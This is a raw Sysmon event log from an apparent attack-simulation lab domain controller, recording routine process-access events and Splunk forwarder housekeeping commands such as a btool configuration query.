13:34:19.017{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002018Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:19.017{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002017Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.017{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002016Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:19.017{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002015Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.017{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-8E5B-6005-5300-00000000A301}3548C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002014Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.017{59A5CD1D-8E5B-6005-5200-00000000A301}35363632C:\Windows\system32\cmd.exe{59A5CD1D-8E5B-6005-5300-00000000A301}3548C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
154100x80000000000000002013Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.019{59A5CD1D-8E5B-6005-5300-00000000A301}3548C:\Program Files\SplunkUniversalForwarder\bin\btool.exe8.0.2btoolsplunk ApplicationSplunk Inc.btool.exebtool server list replication_port --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B{59A5CD1D-8E5B-6005-5200-00000000A301}3536C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c btool server list replication_port --no-log 10341000x80000000000000002012Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.001{59A5CD1D-8E58-6005-3A00-00000000A301}36643684C:\Windows\system32\conhost.exe{59A5CD1D-8E5B-6005-5200-00000000A301}3536C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002011Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:19.001{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002010Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.001{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002009Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:19.001{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002008Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.001{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002007Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:19.001{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002006Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.001{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002005Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:19.001{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002004Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.001{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002003Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:19.001{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002002Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.001{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-8E5B-6005-5200-00000000A301}3536C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002001Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.001{59A5CD1D-8E59-6005-4800-00000000A301}39683972C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe{59A5CD1D-8E5B-6005-5200-00000000A301}3536C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\ucrtbase.dll+9ea4a|C:\Windows\System32\ucrtbase.dll+9e42e|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+43bc6|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+18274|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+1adfc|C:\Program 
Files\SplunkUniversalForwarder\bin\splunk.exe+4cf68|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002000Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.014{59A5CD1D-8E5B-6005-5200-00000000A301}3536C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c btool server list replication_port --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{59A5CD1D-8E59-6005-4800-00000000A301}3968C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal pre-flight-checks --answer-yes --no-prompt 10341000x80000000000000002286Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:20.939{59A5CD1D-8E44-6005-0B00-00000000A301}8563980C:\Windows\system32\lsass.exe{59A5CD1D-8E5B-6005-5F00-00000000A301}3424C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x80000000000000002285Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:20.939{59A5CD1D-8E44-6005-0B00-00000000A301}8563980C:\Windows\system32\lsass.exe{59A5CD1D-8E5B-6005-5F00-00000000A301}3424C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002284Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:20.876{59A5CD1D-8E58-6005-3A00-00000000A301}36643684C:\Windows\system32\conhost.exe{59A5CD1D-8E5C-6005-6700-00000000A301}3736C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002283Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:20.876{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002282Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:20.876{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002281Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:20.876{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002280Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:20.876{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002279Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
